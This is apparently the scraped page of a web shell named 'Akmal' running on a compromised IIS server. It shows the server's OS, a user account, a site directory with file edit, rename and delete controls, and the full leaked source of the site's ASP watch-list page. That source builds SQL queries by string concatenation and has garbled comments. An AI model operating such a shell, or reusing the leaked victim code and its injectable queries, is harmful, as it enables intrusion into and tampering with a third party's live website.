Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<link rel="stylesheet" type="text/css" href="css/thickbox.css" /> <script type="text/javascript" src="js/jquery-1.4.4.min.js"></script> <script type="text/javascript" src="js/ThickBox/thickbox.js"></script> <!--#include file="conn.asp" --> <!--#include file="Cls_Page.asp"--> <style type="text/css"> <!-- .STYLE1 { font-family: Verdana; font-weight: bold; font-size: 18px; color:#000000; } .STYLE2 { font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; } --> </style> <script language="javascript"> function delete_confirm(e) { if (event.srcElement.outerText == "ɾ��") event.returnValue =confirm("��ȷ��Ҫɾ����"); } document.onclick=delete_confirm; </script> <% userid=session("userid") if len(userid)=0 then response.End() end if %> <div class="STYLE1" style="text-align:center; margin-top:10px"> My Watch List </div> <div id="cms_main" style="margin-top:10px; height:698px"> <table width="100%" id="main_content" border="0" cellpadding="0" cellspacing="0" rules="rows" > <tr class="content_title" height="60" style="background-color:#D5D5D5"> <td width="122" height="38"><div align="center"></div></td> <td width="571" style="text-align:center"><strong>Product Name</strong></td> <td width="91"><div align="center"><strong>Watch Price</strong></div></td> <td width="181" style="background-image:none;"> </td> </tr> <tr> <td style="height:10px"> </td> </tr> <% Thispage ="http://" & Request.ServerVariables("SERVER_NAME")& Request.ServerVariables("URL") Dim SS(1000,6) UserEmail=session("UserEmail") if len(UserEmail)=0 then UserEmail=Request.Cookies("UserEmail") end if Set Page = new Cls_Page '�������� Set Page.Conn = conn '�õ����ݿ����Ӷ��� With Page .PageSize = 10 'ÿҳ��¼���� .PageParm = "page" 'ҳ���� '.PageIndex = 10 '��ǰҳ����ѡ������һ�������ɾ�̬ʱ��Ҫ .Database = "ac" '���ݿ�����,ACΪaccess,MSSQLΪsqlserver2000�洢���̰�,MYSQLΪmysql,PGSQLΪPostGreSql .Pkey="id" '���� .Field="id,userid,productid,targetprice,adddate,state" '�ֶ� .Table="pricewatch" '���� .Condition="userid="&userid&" " '����,����Ҫwhere .OrderBy="adddate desc" '����,����Ҫorder by,��Ҫasc����desc .RecordCount = 0 '�ܼ�¼���������ⲿ��ֵ��0�����棨�ʺ���������-1��Ϊsession��-2��Ϊcookies��-3��Ϊapplacation .NumericJump = 5 '��������ҳ��������ѡ������Ĭ��Ϊ3������Ϊ��ת������0Ϊ��ʾ���� .Template = "<div class=""page_list""><div class=""list_info"">{$FirstPage}{$PreviousPage}{$NumericPage}{$NextPage}{$LastPage}</div></div>" '����ģ�壬��ѡ��������Ĭ��ֵ .FirstPage = " << " '��ѡ��������Ĭ��ֵ '.FirstPage = "��ҳ" .PreviousPage = " < " '��ѡ��������Ĭ��ֵ '.PreviousPage = "��һҳ" .NextPage = " > " '��ѡ��������Ĭ��ֵ '.NextPage = "��һҳ" .LastPage = " >> " '��ѡ��������Ĭ��ֵ '.LastPage = "βҳ" .NumericPage = "{$PageNum}" '���ַ�ҳ����ģ�壬��ѡ��������Ĭ��ֵ End With rs = Page.ResultSet() '��¼�� 'rc = Page.RowCount() '��ѡ������ܼ�¼�� nav = Page.Nav() '��ҳ��ʽ If IsNull(rs) Then %> <% Else For i=0 To Ubound(rs,2) %> <form name="change<%=rs(0,i)%>" method="post" action="?Action=change&id=<%=rs(0,i)%>&page=<%=CMSpage%>" onSubmit="return check<%=rs(0,i)%>()"> <% set rs11=server.CreateObject("adodb.recordset") sql11="select * from newproductlist where productid='"&rs(2,i)&"'" rs11.open sql11,conn,1,1 if not rs11.eof then typeid=rs11("typeid") Imgsrc=rs11("ImgPrev") productname=rs11("productname") price1=rs11("price1") price2=rs11("price2") tejia=rs11("tejia") if rs(3,i)<>0 then targetprice= rs(3,i) else if tejia=1 then targetprice=price2 else targetprice=price1 end if end if %> <tr> <td height="43"><img src="<%=Imgsrc%>" width="60" height="60"/></td> <td align="left"><a href="newproductdetail.asp?productid=<%=rs(2,i)%>&typeid=<%=typeid%>" target="_blank"><font style="color:#e4007e"><%=rs(2,i)%>:<%=productname%></font></a></td> <td align="left"><%=targetprice%>$</td> <td align="left"><span style="background-color:#EAEAEA"> <a title="Delete" href="myaccount.asp?ID=MyAsc365&watchid=<%=rs(0,i)%>&action=deletewatch" page="<%=CMSpage%>" onclick="delete_confirm()"><span class="STYLE2">Delete</span></a></span></td> </tr> </form> <% end if rs11.close Cart_js=Cart_js+1 next End If %> </table> <%Response.Write nav %> </div>